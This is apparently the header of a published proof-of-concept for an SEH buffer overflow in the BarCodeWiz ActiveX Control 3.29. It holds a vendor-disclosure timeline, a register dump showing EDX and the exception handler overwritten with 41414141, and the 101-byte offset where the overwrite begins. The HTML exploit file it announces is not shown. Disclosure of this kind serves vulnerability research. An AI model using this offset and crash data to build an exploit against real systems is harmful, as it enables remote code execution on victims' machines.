# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH) # Bug found: 24th July 2010 # Found by: loneferret # Software: http://www.barcodewiz.com/ # Nods to exploit-db.com # Vulnerable file BarCodeWiz.dll # LoadProperties method # Tested on: # Windows XP Professional SP3 & Windows XP Home SP3 # Internet Explorer 6 & Internet Explorer 7 # Vendor contacted: 24th July 2010 # Vendor first reply: 26th July 2010: Wanting more information # Vendor contacted: 26th July 2010: Sent 2 proof of concepts files # Vendor contacted: 29 July 2010: Asked for update # No Response from vendor: 30 July 2010 # Public Release : 30 Juley 2010 # CPU Registers Information # # EAX 7EFEFEFE # ECX 0013FBF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA................. # EDX 41414141 # EBX 01AB3D68 # ESP 0013AC94 # EBP 0013AD48 # ESI 00000000 # EDI 0013FFFD # EIP 1002F379 BarcodeW.1002F379 # C 0 ES 0023 32bit 0(FFFFFFFF) # P 1 CS 001B 32bit 0(FFFFFFFF) # A 0 SS 0023 32bit 0(FFFFFFFF) # Z 1 DS 0023 32bit 0(FFFFFFFF) # S 0 FS 003B 32bit 7FFDF000(FFF) # T 0 GS 0000 NULL # D 0 # O 0 LastErr ERROR_SUCCESS (00000000) # EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) # ST0 empty -??? FFFF 00690069 00690069 # ST1 empty -??? FFFF 00F000F0 00F000F0 # ST2 empty -??? FFFF 00690058 00570054 # ST3 empty -??? FFFF 00EF00C9 00C600C1 # ST4 empty -NAN FFFF FFD9D7D2 FFEEEDEB # ST5 empty -??? FFFF 00F000C9 00C700C2 # ST6 empty 1.0000000000000000000 # ST7 empty 2838.0000000000000000 # 3 2 1 0 E S P U O Z D I # FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) # FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 # SEH Information # # SEH chain of main thread, item 0 # Address=0013E574 # SE handler=41414141 # SEH is overwritten starting at the 101th position of our buffer. ----HTML FILE FROM HERE ON-----

Barcodewiz 3.29